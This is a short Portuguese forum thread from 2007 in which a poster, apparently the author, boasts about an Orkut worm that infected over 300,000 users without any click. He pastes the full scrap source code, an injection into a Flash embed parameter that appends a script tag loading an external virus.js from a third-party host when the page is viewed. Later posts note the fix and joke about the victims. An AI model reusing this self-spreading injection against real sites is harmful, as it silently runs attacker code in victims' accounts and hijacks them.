Falha no Orkut permite que a vítima seja infectada sem clicar em nenhum link malicioso.
Trata-se de um JS inserido em flash que faz a vítima entrar em uma comunidade sem seu conhecimento (ou fazer coisas bem piores...).
A falha foi explorada por RodLac hoje e já pegou mais de 300.000 usuários.
Comunidade:
http://www.orkut.com/Community.aspx?cmm=44001818 (http://www.orkut.com/Community.aspx?cmm=44001818)
[Noticia bem mal-feita

é que fui eu quem fiz^^]
Putz! to dormindo^^
Esqueci alguns detalhes
Recado com o virus:
2008 vem ai... que ele comece mto bem para vc
RL Wed Dec 19 2007 02:03:22 GMT-0200 (Hora oficial do Brasil)
Codigo-fonte no scrapbook:
<div class="para" >
2008 vem ai... que ele comece mto bem para vc<br><font color="#C6C6C6">RL Wed Dec 19 2007 02:03:22 GMT-0200 (Hora oficial do Brasil)</font><br><div id="flashDiv33423118"><b>Para visualizar este conteúdo, atualize para a versão mais recente de plug-in Flash em <a href="http://www.macromedia.com/go/getflashplayer/" target="_blank">http://www.macromedia.com/go/getflashplayer</a>.</b></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '33423118', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '33423118'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv33423118');</script>
<div class="lf">
</div>
JS: 'http://files.myopera.com/virusdoorkut/files/virus.js'
Excuse me for double post
Em um dos topicos da comu falam que o bug ja foi corrigido
criaram ate uma comunidade
"eu tava no virus do orkut"

http://www.orkut.com/Community.aspx?cmm=7246810&refresh=1 (//http://www.orkut.com/Community.aspx?cmm=7246810&refresh=1)
mais uma falha sussa do orkut
huahauahuahaua